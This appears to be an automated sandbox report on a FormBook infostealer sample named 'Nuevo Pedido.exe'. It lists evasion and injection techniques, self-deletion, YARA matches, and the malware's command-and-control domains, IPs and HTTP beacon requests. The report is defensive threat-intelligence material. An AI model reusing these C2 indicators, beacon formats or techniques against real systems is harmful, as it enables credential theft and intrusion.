Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name: Nuevo Pedido.exe
Analysis ID: 528617
MD5: 159c46c59cd8ecb7a2bce707de1bc370
SHA1: e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256: 7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Nuevo Pedido.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
    • Nuevo Pedido.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Nuevo Pedido.exe MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6420 cmdline: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.0.Nuevo Pedido.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
      3.0.Nuevo Pedido.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
      3.0.Nuevo Pedido.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
      0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
      3.0.Nuevo Pedido.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            AV Detection:

            Found malware configuration
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
            Multi AV Scanner detection for submitted file
            Source: Nuevo Pedido.exe, Virustotal: Detection: 32%
            Source: Nuevo Pedido.exe, ReversingLabs: Detection: 33%
            Yara detected FormBook
            Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: Nuevo Pedido.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Nuevo Pedido.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 4x nop then pop edi, 3_2_00415660
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 4x nop then pop esi, 3_2_004157D8
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 4x nop then pop esi, 3_2_004157AA
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop edi, 16_2_00615660
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop esi, 16_2_006157D8
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop esi, 16_2_006157AA

            Networking:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe, Domain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exe, Domain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exe, Network Connect: 185.53.179.91 80
            Source: C:\Windows\explorer.exe, Domain query: www.tremblock.com
            Source: C:\Windows\explorer.exe, Domain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exe, Domain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exe, Network Connect: 3.64.163.50 80
            Source: C:\Windows\explorer.exe, Domain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exe, Domain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exe, Network Connect: 192.232.250.147 80
            Source: C:\Windows\explorer.exe, Network Connect: 185.53.178.53 80
            Source: C:\Windows\explorer.exe, Domain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.163 80
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor, URLs: www.spoiledzone.com/udeh/
            Source: Joe Sandbox View, ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.tremblock.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
            Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.rcepjobs.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
            Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.downingmunroe.online; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
            Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.thejohnmatt.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
            Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.onlinedatingthaiweb.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
            Source: Joe Sandbox View, IP Address: 3.64.163.50 3.64.163.50
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Thu, 25 Nov 2021 14:10:30 GMT; Content-Type: text/html; Content-Length: 146; Connection: close; Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Thu, 25 Nov 2021 14:11:10 GMT; Content-Type: text/html; Content-Length: 146; Connection: close; Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp, String found in binary or memory: http://www.rcepjobs.com
            Source: unknown, DNS traffic detected: queries for: www.tremblock.com

            E-Banking Fraud:

            Yara detected FormBook

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
